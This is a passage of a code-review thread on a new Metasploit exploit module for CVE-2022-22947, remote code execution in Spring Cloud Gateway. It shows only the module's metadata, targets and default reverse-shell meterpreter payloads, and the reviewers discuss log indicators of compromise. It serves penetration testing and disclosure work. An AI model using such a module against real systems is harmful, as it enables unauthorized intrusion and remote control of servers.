modules/exploits/linux/http/spring_cloud_gateway_rce.rb

```diff
@@ -0,0 +1,165 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Spring Cloud Gateway Remote Code Execution',
+        'Description' => %q{
+          This module exploits an unauthenticated remote code execution vulnerability in Spring Cloud Gateway
+          versions = 3.1.0 and 3.0.0 to 3.0.6. The vulnerability can be exploited when the Gateway Actuator
+          endpoint is enabled, exposed and unsecured. An unauthenticated attacker can use SpEL
+          expressions to execute code and take control of the victim machine.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ayan Saha'
+        ],
+        'References' => [
+          ['CVE', '2022-22947' ],
+          ['URL', 'https://github.com/crowsec-edtech/CVE-2022-22947'],
+          ['URL', 'https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/'],
+          ['URL', 'https://tanzu.vmware.com/security/cve-2022-22947'],
+          ['URL', 'https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published']
+        ],
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X64, ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Linux (Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            }
+          ],
+        ],
+        'DisclosureDate' => '2022-01-26',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
```

Comment:
This should be updated to also include IOCs in logs since this will cause binding validation errors in the log of the application we are targetting.

Reply:
Resolved in https://github.com/rapid7/metasploit-framework/pull/17116/commits/487a26ee0f2c5817826fb11e1b3ad9d7ce1e5f6a

Reply:
https://github.com/rapid7/metasploit-framework/pull/17094#discussion_r986253703